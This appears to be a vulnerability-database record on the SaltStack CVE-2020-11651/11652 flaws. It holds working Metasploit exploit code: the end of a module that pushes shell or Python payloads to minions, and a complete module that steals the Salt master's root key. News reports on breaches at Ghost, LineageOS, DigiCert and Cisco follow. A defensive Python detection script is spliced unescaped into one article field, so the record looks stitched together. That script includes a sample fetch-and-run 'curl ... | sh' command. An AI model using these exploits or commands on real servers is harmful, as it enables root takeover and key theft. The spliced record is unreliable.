'user' => 'root', # This is NOT the Unix user!\n 'tgt' => datastore['MINIONS'],\n 'tgt_type' => 'pcre',\n 'jid' => jid\n }\n\n case target['Type']\n when :python\n vprint_status(\"Executing Python code: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\n send_pub.merge!(\n 'fun' => 'cmd.exec_code',\n 'arg' => [payload.arch.first, payload.encoded]\n )\n when :unix_cmd\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.run\n send_pub.merge!(\n 'fun' => 'cmd.run',\n 'arg' => [payload.encoded]\n )\n end\n\n vprint_status(\"Unserialized clear load: #{send_pub}\")\n zmq_send_message(serialize_clear_load(send_pub))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive _send_pub() response')\n end\n\n vprint_good(\"Received _send_pub() response: #{res.inspect}\")\n\n # NOTE: This path will likely change between platforms and distros\n register_file_for_cleanup(\"/var/cache/salt/minion/proc/#{jid}\")\n end\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/utils/jid.py\n # https://github.com/saltstack/salt/blob/v3000.1/salt/utils/jid.py\n def generate_jid\n DateTime.now.new_offset.strftime('%Y%m%d%H%M%S%6N')\n end\n\n # HACK: Stub out the command stager used by Msf::Exploit::CmdStager::HTTP\n def stager_instance\n nil\n end\n\n # HACK: Sub out the executable used by Msf::Exploit::CmdStager::HTTP\n def exe\n # NOTE: The shebang line is necessary in this case!\n <<~SHELL\n #!/bin/sh\n /bin/sh\n SHELL\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-02T10:49:34", "description": "This module exploits unauthenticated access to the _prep_auth_info() method in the SaltStack Salt 
master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the root key used to authenticate administrative commands to the master. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.\n", "cvss3": {}, "published": "2020-05-11T17:05:38", "type": "metasploit", "title": "SaltStack Salt Master Server Root Key Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2021-05-01T04:26:18", "id": "MSF:AUXILIARY-GATHER-SALTSTACK_SALT_ROOT_KEY-", "href": "https://www.rapid7.com/db/modules/auxiliary/gather/saltstack_salt_root_key/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::ZeroMQ\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt Master Server Root Key Disclosure',\n 'Description' => %q{\n This module exploits unauthenticated access to the _prep_auth_info()\n method in the SaltStack Salt master's ZeroMQ request server, for\n versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the\n root key used to authenticate administrative commands to the master.\n\n VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as\n well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual\n Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2,\n 1.3, 1.5, and 1.6 in certain configurations, are known to be affected\n by the Salt 
vulnerabilities.\n\n Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n well as Vulhub's Docker image.\n },\n 'Author' => [\n 'F-Secure', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-11651'], # Auth bypass (used by this module)\n ['CVE', '2020-11652'], # Authed directory traversals (not used here)\n ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],\n ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG'],\n ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']\n ],\n 'DisclosureDate' => '2020-04-30', # F-Secure advisory\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Dump', { 'Description' => 'Dump root key from Salt master' }]\n ],\n 'DefaultAction' => 'Dump',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n Opt::RPORT(4506)\n ])\n end\n\n def run\n # These are from Msf::Exploit::Remote::ZeroMQ\n zmq_connect\n zmq_negotiate\n\n unless (root_key = extract_root_key(yeet_prep_auth_info))\n print_error('Could not find root key in serialized auth info')\n\n # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce\n return Exploit::CheckCode::Safe\n end\n\n print_good(\"Root key: #{root_key}\")\n\n # I hate this API, but store the root key in creds, too\n create_credential_and_login(\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n address: rhost,\n port: rport,\n protocol: 'tcp',\n service_name: 'salt/zeromq',\n username: 'root',\n private_data: root_key,\n private_type: :password\n )\n\n # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce\n 
Exploit::CheckCode::Vulnerable(root_key) # And the root key as the reason!\n rescue EOFError, Rex::ConnectionError => e\n print_error(\"#{e.class}: #{e.message}\")\n Exploit::CheckCode::Unknown\n ensure\n # This is from Msf::Exploit::Remote::ZeroMQ\n zmq_disconnect\n end\n\n def yeet_prep_auth_info\n print_status(\"Yeeting _prep_auth_info() at #{peer}\")\n\n zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info'))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive auth info')\n end\n\n unless res.match(/user.+UserAuthenticationError.+root/m)\n fail_with(Failure::UnexpectedReply,\n \"Did not receive serialized auth info: #{res.inspect}\")\n end\n\n vprint_good('Received serialized auth info')\n\n # HACK: Strip assumed ZeroMQ header and leave assumed MessagePack \"load\"\n res[4..-1]\n end\n\n def extract_root_key(auth_info)\n # Fetch root key from appropriate index of deserialized data, presumably\n MessagePack.unpack(auth_info)[2]&.fetch('root')\n rescue EOFError, KeyError, MessagePack::MalformedFormatError => e\n print_error(\"#{__method__} failed: #{e.message}\")\n nil\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/saltstack_salt_root_key.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-05-09T12:38:29", "description": "Days after cybersecurity researchers sounded the alarm over two critical vulnerabilities in the [SaltStack configuration framework](<https://thehackernews.com/2020/05/saltstack-rce-vulnerability.html>), a hacking campaign has already begun exploiting the flaws to breach servers of LineageOS, Ghost, and DigiCert. 
\n \nTracked as **CVE-2020-11651** and **CVE-2020-11652**, the disclosed flaws could allow an adversary to execute arbitrary code on remote servers deployed in data centers and cloud environments. The issues were fixed by SaltStack in a [release](<https://docs.saltstack.com/en/latest/topics/releases/3000.2.html>) published on April 29th. \n \n\"We expect that any competent hacker will be able to create 100% reliable exploits for these issues in under 24 hours,\" F-Secure researchers had previously warned in an advisory last week. \n \nLineageOS, a maker of an open-source operating system based on Android, said it detected the intrusion on May 2nd at around 8 pm Pacific Time. \n \n\"Around 8 pm PST on May 2nd, 2020, an attacker used a CVE in our SaltStack master to gain access to our infrastructure,\" the [company noted](<https://status.lineageos.org/issues/5eae596b4a0ebd114676545f>) in its incident report but added Android builds and signing keys were unaffected by the breach. \n \nGhost, a Node.js based blogging platform, also fell victim to the same flaw. In its status page, the developers noted that \"around 1:30 am UTC on May 3rd, 2020, an attacker used a CVE in our SaltStack master to gain access to our infrastructure\" and install a cryptocurrency miner. \n \n\"The mining attempt spiked CPUs and quickly overloaded most of our systems, which alerted us to the issue immediately,\" [Ghost added](<https://status.ghost.org/incidents/tpn078sqk973>). \n \nGhost, however, confirmed there was no evidence the incident resulted in a compromise of customer data, passwords, and financial information. \n \nBoth LineageOS and Ghost have restored the services after taking the servers offline to patch the systems and secure them behind a new firewall. \n \nIn a separate development, the Salt vulnerability was used to hack into DigiCert certificate authority as well. 
\n \n\"We discovered today that [CT Log](<https://www.digicert.com/certificate-transparency/overview.htm>) 2's key used to sign SCTs (signed certificate timestamps) was compromised last night at 7 pm via the Salt vulnerability,\" DigiCert's VP of Product Jeremy Rowley said in a [Google Groups](<https://groups.google.com/a/chromium.org/forum/#!topic/ct-policy/aKNbZuJzwfM>) post made on Sunday. \n \nIn an email conversation with The Hacker News, DigiCert also said it's deactivating its CT 2 log server following the incident but clarified that the other certificate transparency logs, CT 1, Yeti, and Nessie were not impacted. \n \n\"On May 3, DigiCert announced that it is deactivating its Certificate Transparency (CT) 2 log server after determining that the key used to sign SCTs may have been exposed via critical SALT vulnerabilities,\" the [company said](<https://www.digicert.com/digicert-statement-on-ct2-log/>). \n \n\"We do not believe the key was used to sign SCTs outside of the CT log's normal operation, though as a precaution, CAs that received SCTs from the CT2 log after May 2 at 5 pm MST should receive an SCT from another trusted log. Three other DigiCert CT logs: CT1, Yeti, and Nessie, are not affected as they are run on completely different infrastructure. 
The impacts are limited to only the CT2 log and no other part of DigiCert's CA or CT Log systems,\" \n \nWith F-Secure's alert revealing [more than 6,000 Salt vulnerable servers](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>) that can be exploited via this vulnerability, if left unpatched, companies are advised to update the Salt software packages to the latest version to resolve the flaws.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-04T04:00:00", "type": "thn", "title": "Hackers Breach LineageOS, Ghost, DigiCert Servers Using SaltStack Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-06T08:18:06", "id": "THN:00FCCD16591B1900512E0B089F2A6BC8", "href": "https://thehackernews.com/2020/05/saltstack-rce-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:29", "description": 
"Two severe security flaws have been discovered in the open-source [SaltStack Salt configuration framework](<https://www.saltstack.com/>) that could allow an adversary to execute arbitrary code on remote servers deployed in data centers and cloud environments. \n \nThe vulnerabilities were identified by F-Secure researchers earlier this March and disclosed on Thursday, a day after SaltStack [released](<https://github.com/saltstack/community/blob/master/doc/Community-Message.pdf>) a patch (version 3000.2) [addressing the issues](<https://docs.saltstack.com/en/latest/topics/releases/3000.2.html>), which are rated with a CVSS score of 10. \n \n\"The vulnerabilities, allocated CVE IDs [CVE-2020-11651](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) and [CVE-2020-11652](<https://nvd.nist.gov/vuln/detail/CVE-2020-11652>), are of two different classes,\" the cybersecurity [firm said](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>). \n \n\"One being authentication bypass where functionality was unintentionally exposed to unauthenticated network clients, the other being directory traversal where untrusted input (i.e., parameters in network requests) was not sanitized correctly allowing unconstrained access to the entire filesystem of the master server.\" \n \nThe researchers warned that the flaws could be exploited in the wild imminently. SaltStack is also urging users to follow the best practices to [secure the Salt environment](<https://docs.saltstack.com/en/master/topics/hardening.html#general-hardening-tips>). \n \n\n\n## Vulnerabilities in ZeroMQ Protocol\n\n \nSalt is a powerful Python-based automation and remote execution engine that's designed to allow users to issue commands to multiple machines directly. 
\n \nBuilt as a utility to monitor and update the state of servers, Salt employs a master-slave architecture that automates the process of pushing out configuration and software updates from a central repository using a \"master\" node that deploys the changes to a target group of \"minions\" (e.g., servers) en masse. \n \nThe [communication](<https://docs.saltstack.com/en/getstarted/system/communication.html>) between a master and minion occurs over the ZeroMQ message bus. Additionally, the master uses two ZeroMQ channels, a \"request server\" to which minions report the execution results and a \"publish server,\" where the master publishes messages that the minions can connect and subscribe to. \n \nAccording to F-Secure researchers, the pair of flaws reside within the tool's ZeroMQ protocol. \n \n\"The vulnerabilities described in this advisory allow an attacker who can connect to the 'request server' port to bypass all authentication and authorization controls and publish arbitrary control messages, read and write files anywhere on the 'master' server filesystem and steal the secret key used to authenticate to the master as root,\" the researchers said. \n \n\"The impact is full remote command execution as root on both the master and all minions that connect to it.\" \n \nIn other words, an attacker can exploit the flaws to call administrative commands on the master server as well as queue messages directly on the master publish server, thereby allowing the salt minions to run malicious commands. \n \nWhat's more, a directory traversal vulnerability identified in the [wheel module](<https://docs.saltstack.com/en/master/ref/wheel/all/index.html>) \u2014 which has functions to read and write files to specific locations \u2014 can permit reading of files outside of the intended directory due to a failure to properly sanitize file paths. 
\n \n\n\n## Detecting Vulnerable Salt Masters\n\n \nF-Secure researchers said an initial scan revealed more than 6,000 vulnerable Salt instances exposed to the public internet. \n \nDetecting possible attacks against susceptible masters, therefore, entails auditing published messages to minions for any malicious content. \"Exploitation of the authentication vulnerabilities will result in the ASCII strings \"_prep_auth_info\" or \"_send_pub\" appearing in data sent to the request server port (default 4506),\" it added. \n \nIt's highly recommended that Salt users update the software packages to the latest version. \n \n\"Adding network security controls that restrict access to the salt master (ports 4505 and 4506 being the defaults) to known minions, or at least block the wider Internet, would also be prudent as the authentication and authorization controls provided by Salt are not currently robust enough to be exposed to hostile networks,\" the researchers said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-01T13:04:00", "type": "thn", "title": "Critical SaltStack RCE Bug (CVSS Score 10) Affects Thousands of Data Centers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-06-10T14:48:28", "id": "THN:8E401822CBD35E8E7CCE9E5DD922A70E", "href": "https://thehackernews.com/2020/05/saltstack-rce-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-10-02T21:54:30", "description": "Hackers targeted the publishing platform Ghost over the weekend, launching a cryptojacking attack against its servers that led to widespread outages. The attack stemmed from the exploit of critical [vulnerabilities in ](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>)[SaltStack](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>), used in Ghost\u2019s server management infrastructure.\n\nGhost is a free, open-source blogging platform with an install base of over 2 million, including big-name customers like Mozilla and DuckDuckGo. The company, which touts itself as an alternative to platforms like WordPress, Medium and Tumblr, first posted on Sunday at 3:24 BST that customers were experiencing service outages. It has since fixed the issue and systems are up and running again, as of Monday.\n\nUpon further investigation, Ghost said that the hack stemmed from attackers exploiting two flaws, [CVE-2020-11651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11651>) and[ CVE-2020-11652](<https://nvd.nist.gov/vuln/detail/CVE-2020-11652>), which allow full remote code execution as root on servers in data centers and cloud environments. 
The two flaws specifically exist in SaltStack\u2019s open-source Salt management framework, used by customers like Ghost as an [open-source configuration tool](<https://github.com/saltstack/salt>) to monitor and update the state of their servers.\n\n\u201cAll traces of the crypto-mining virus were successfully eliminated yesterday, all systems remain stable, and we have not discovered any further concerns or issues on our network,\u201d according to Ghost\u2019s [announcement](<https://status.ghost.org/>) on its status update page. \u201cThe team is now working hard on remediation to clean and rebuild our entire network. We will keep this incident open and continue to share updates until it is fully resolved. We will also be contacting all customers directly to notify them of the incident, and publishing a public post-mortem later this week.\u201d\n\nCVE-2020-11651 is an authentication bypass issue, while CVE-2020-11652 is a directory-traversal flaw where untrusted input (i.e. parameters in network requests) is not sanitized correctly. This in turn allows access to the entire filesystem of the master server, researchers found.\n\nSaltStack has released patches for the flaws in [release 3000.2](<https://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html>), on April 30 \u2013 however, researchers with F-Secure, who discovered the flaws, said a preliminary scan revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet. As such, researchers warned that they expect in-the-wild attacks to be launched against the flaws imminently.\n\nIt appears that some of those vulnerable Salt instances belonged to Ghost. After exploiting the flaws, attackers were able to launch a cryptocurrency mining attack, which in turn spiked CPU usage and overloaded systems. 
Both Ghost Pro sites and Ghost.org billing services were affected \u2013 though Ghost said that credit card data was not affected. Ghost said that a fix has been implemented and that additional firewall configurations are now running.\n\n\u201cAt this time there is no evidence of any attempts to access any of our systems or data,\u201d according to Ghost. \u201cNevertheless, all sessions, passwords and keys are being cycled and all servers are being re-provisioned.\u201d\n\nAlex Peay, senior vice president of Product at SaltStack, told Threatpost that \u201cupon notification of the CVE, SaltStack took immediate action to remediate the vulnerability, develop and issue patches, and communicate to our customers about the affected versions so they can prepare their systems for update.\u201d\n\n\u201cWe must reinforce how critical it is that all Salt users patch their systems and follow the guidance we have provided outlining steps for remediation and best practices for Salt environment security,\u201d Peay said. \u201cIt is equally important to upgrade to latest versions of the platform and register with support for future awareness of any possible issues and remediations.\u201d\n\nThreatpost has reached out to Ghost for further comment.\n
", "cvss3": {}, "published": "2020-05-04T19:23:41", "type": "threatpost", "title": "Hackers Exploit Critical Flaw in Ghost Platform with Cryptojacking Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-04T19:23:41", "id": "THREATPOST:A1F6C89E2D2F2205B93C6727C24B908C", "href": "https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:25:49", "description": "The open-source Salt management framework contains high-severity security vulnerabilities that allow full remote code execution as root on servers in data centers and cloud environments. And in-the-wild attacks are expected imminently.\n\nAccording to F-Secure researchers, the framework, authored by the company SaltStack but also used as an [open-source configuration tool](<https://github.com/saltstack/salt>) to monitor and update the state of servers, has a pair of flaws within its default communications protocol, known as ZeroMQ.\n\nA bug tracked as CVE-2020-11651 is an authentication bypass issue, while CVE-2020-11652 is a directory-traversal flaw where untrusted input (i.e. parameters in network requests) is not sanitized correctly. 
This in turn allows access to the entire filesystem of the master server, researchers found.\n\nThe bugs are especially dangerous given the topology of the Salt framework.\n\n\u201cEach server [managed by Salt] runs an agent called a \u2018minion,\u2019 which connects to a \u2018master,\u2019\u201d explained F-Secure, [in a writeup](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>) on Thursday. \u201c[A master is a] Salt installation that collects state reports from minions and publishes update messages that minions can act on.\u201d\n\nThese update messages are usually used to change the configuration of a selection of servers, but they can also be used to push out commands to multiple, or even all, of the managed systems, researchers said. An adversary who compromises the master can thus send malicious commands to all of the other servers in the cluster at the same time.\n\n## **Lapses in Protocol**\n\nTo communicate, the master uses two [ZeroMQ channels](<https://docs.saltstack.com/en/getstarted/system/communication.html>). As F-Secure explained, one is a \u201crequest server\u201d where minions can connect to report their status (or the output of commands). The other is a \u201cpublish server\u201d where the master publishes messages that the minions can connect and subscribe to.\n\nThe authentication bypass can be achieved because the ClearFuncs class processes unauthenticated requests and unintentionally exposes the \u201c_send_pub()\u201d method. This is the method used to queue messages from the master publish server to the minions \u2013 and thus can be used to send arbitrary commands. Such messages can be used to trigger minions to run arbitrary commands as root.\n\nAlso, \u201cthe ClearFuncs class also exposes the method _prep_auth_info(), which returns the root key used to authenticate commands from the local root user on the master server. 
This root key can then be used to remotely call administrative commands on the master server. This unintentional exposure provides a remote un-authenticated attacker with root-equivalent access to the salt master.\u201d\n\nAs for the directory traversal, the \u201cwheel\u201d module contains commands used to read and write files under specific directory paths.\n\n\u201cThe inputs to these functions are concatenated with the target directory and the resulting path is not canonicalized, leading to an escape of the intended path restriction,\u201d according to the writeup. \u201cThe get_token() method of the salt.tokens.localfs class (which is exposed to unauthenticated requests by the ClearFuncs class) fails to sanitize the token input parameter which is then used as a filename, allowing\u2026the reading of files outside of the intended directory.\u201d\n\nThe bugs together allow attackers \u201cwho can connect to the request server port to bypass all authentication and authorization controls and publish arbitrary control messages, read and write files anywhere on the master server filesystem and steal the secret key used to authenticate to the master as root,\u201d according to the firm.\n\nAccording to the National Vulnerability Database, \u201cThe salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. 
These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.\u201d\n\n## **Exploits in Less Than a Day**\n\nF-Secure said that it expects to see attacks in the wild very shortly.\n\n\u201cWe expect that any competent hacker will be able to create 100 percent reliable exploits for these issues in under 24 hours,\u201d the researchers said, citing the \u201creliability and simplicity\u201d of exploitation.\n\nUnfortunately, the firm also said that a preliminary scan has revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet.\n\nPatches are available in release 3000.2. Also, \u201cadding network security controls that restrict access to the salt master (ports 4505 and 4506 being the defaults) to known minions, or at least block the wider internet, would also be prudent as the authentication and authorization controls provided by Salt are not currently robust enough to be exposed to hostile networks,\u201d F-Secure concluded.\n\nTo detect exploitation attempts, look for the ASCII strings \u201c_prep_auth_info\u201d or \u201c_send_pub\u201d in data sent to the request server port (default 4506).\n\nAlso on the detection front, \u201cpublished messages to minions are called \u2018jobs\u2019 and will be saved on the master (default path /var/cache/salt/master/jobs/). These saved jobs can be audited for malicious content or job IDs (\u2018jids\u2019) that look out of the ordinary,\u201d F-Secure noted.\n
", "cvss3": {}, "published": "2020-04-30T20:54:50", "type": "threatpost", "title": "Salt Bugs Allow Full RCE as Root on Cloud Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652", "CVE-2020-5135"], "modified": "2020-04-30T20:54:50", "id": "THREATPOST:5CB5F29FA05D52DEEC4D54AA46EB9235", "href": "https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:19:14", "description": "Cisco said attackers have been able to compromise its servers after exploiting two known, critical [SaltStack vulnerabilities](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>). The flaws exist in the open-source Salt management framework, which is used in Cisco network-tooling products.\n\nTwo Cisco products incorporate a version of SaltStack that is running the vulnerable salt-master service. The first is Cisco Modeling Labs Corporate Edition (CML), which gives users a virtual sandbox environment to design and configure network topologies. 
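F-Secure's detection guidance quoted above comes down to two checks: the ASCII strings "_prep_auth_info" and "_send_pub" in data sent to the request server (default TCP 4506), and jobs in the master's job cache (/var/cache/salt/master/jobs/) whose content or job ID looks out of the ordinary. The following helper implements both over in-memory inputs. It is an added example for this page, not code from F-Secure, SaltStack or Cisco: the sample packets and job records are constructed, the field names used for a cached job (`jid`, `fun`, `arg`, `tgt`) are an assumption about the job load Salt stores, and the two heuristics (Salt's default jid being a 20-digit timestamp, and a regex for download-and-execute shell one-liners) are this example's own plausibility checks rather than anything the advisory specifies.

```python
"""Detection helpers for the two indicators F-Secure describe: the ASCII
strings "_prep_auth_info" / "_send_pub" in traffic to the request server
(default TCP 4506) and out-of-the-ordinary jobs in the master's job cache.
Added example, not code from F-Secure or SaltStack; the sample packets and
job records below are constructed, and the heuristics are this example's own."""
import re

REQ_SERVER_PORT = 4506
INDICATORS = (b"_prep_auth_info", b"_send_pub")

# Assumption used as a plausibility check: Salt's default jid is a 20-digit
# YYYYMMDDHHMMSSffffff timestamp. Anything else is flagged for a human look.
JID_RE = re.compile(r"^\d{20}$")

# Download-and-run shapes typical of cryptojacking droppers (example heuristic).
SUSPICIOUS_ARG_RE = re.compile(
    r"(curl|wget)\b[^|]*\|\s*(ba)?sh\b|base64\s+-d|chmod\s+\+x|nohup\b",
    re.IGNORECASE,
)


def scan_request_payloads(packets):
    """packets: iterable of (src_ip, dst_port, payload_bytes).
    Returns one hit per packet to the request server that carries an indicator."""
    hits = []
    for src, dst_port, payload in packets:
        if dst_port != REQ_SERVER_PORT:
            continue
        found = [ind.decode() for ind in INDICATORS if ind in payload]
        if found:
            hits.append({"src": src, "indicators": found})
    return hits


def audit_jobs(jobs):
    """jobs: iterable of dicts with 'jid', 'fun', 'arg', 'tgt' (assumed to be
    the fields of the job load Salt caches). Returns a list of findings."""
    findings = []
    for job in jobs:
        reasons = []
        if not JID_RE.match(str(job.get("jid", ""))):
            reasons.append("jid not a 20-digit timestamp")
        if job.get("fun") in ("cmd.run", "cmd.shell", "cmd.script"):
            args = " ".join(str(a) for a in job.get("arg", []))
            if SUSPICIOUS_ARG_RE.search(args):
                reasons.append("download-and-execute pattern in cmd args")
            if job.get("tgt") == "*":
                reasons.append("shell command broadcast to all minions")
        if reasons:
            findings.append({"jid": job.get("jid"), "reasons": reasons})
    return findings


# Constructed sample data (not real captures). Payloads mimic the msgpack
# framing Salt uses (fixmap, fixstr), but only the indicator bytes matter.
SAMPLE_PACKETS = [
    ("10.0.0.7", 4506, b"\x81\xa3cmd\xa4ping"),                 # benign ping
    ("203.0.113.9", 4506, b"\x81\xa3cmd\xaf_prep_auth_info"),   # root-key grab
    ("203.0.113.9", 4505, b"_send_pub"),                        # publish port, ignored
    ("203.0.113.9", 4506, b"\x82\xa3cmd\xa9_send_pub\xa3fun"),  # publish bypass
]

SAMPLE_JOBS = [
    {"jid": "20200501120000123456", "fun": "state.apply", "arg": [], "tgt": "web*"},
    {"jid": "20200503014500000000", "fun": "cmd.run",
     "arg": ["curl -s http://198.51.100.5/x.sh | sh"], "tgt": "*"},
    {"jid": "1234", "fun": "test.ping", "arg": [], "tgt": "*"},
]


if __name__ == "__main__":
    for hit in scan_request_payloads(SAMPLE_PACKETS):
        print("request-server indicator:", hit)
    for finding in audit_jobs(SAMPLE_JOBS):
        print("job-cache finding:", finding)
```

The string match is deliberately a plain byte search rather than a msgpack decode: a probe that never completes the handshake, or one padded to defeat a parser, still has to carry the method name on the wire, and that is the one thing F-Secure says will be present. The job audit is the complementary, host-side view for a master that was already exposed before the traffic capture started.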
The second is Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), used to design, configure and operate networks using versions of Cisco\u2019s network operating systems.\n\nHackers were able to successfully exploit the flaws in the latter product, resulting in the compromise of six VIRL-PE backend servers, according to Cisco. Those servers are: us-1.virl.info, us-2.virl.info, us-3.virl.info, us-4.virl.info, vsm-us-1.virl.info and vsm-us-2.virl.info.\n\n\u201cCisco infrastructure maintains the salt-master servers that are used with Cisco VIRL-PE,\u201d according to [Cisco\u2019s Thursday alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG>). \u201cThose servers were upgraded on May 7, 2020. Cisco identified that the Cisco maintained salt-master servers that are servicing Cisco VIRL-PE releases 1.2 and 1.3 were compromised.\u201d\n\nCisco said the servers were remediated on May 7. The company also released software updates for the two vulnerable products. Cisco rates the issue \u201ccritical,\u201d 10 out of 10 on the CVSS scale.\n\nThe SaltStack bugs were first made public by the Salt Open Core team on April 29. The flaws can allow full remote code execution as root on servers in data centers and cloud environments. They include an authentication bypass issue, tracked as CVE-2020-11651, and a directory-traversal flaw, CVE-2020-11652, where untrusted inputs (i.e. parameters in network requests) are not sanitized correctly. 
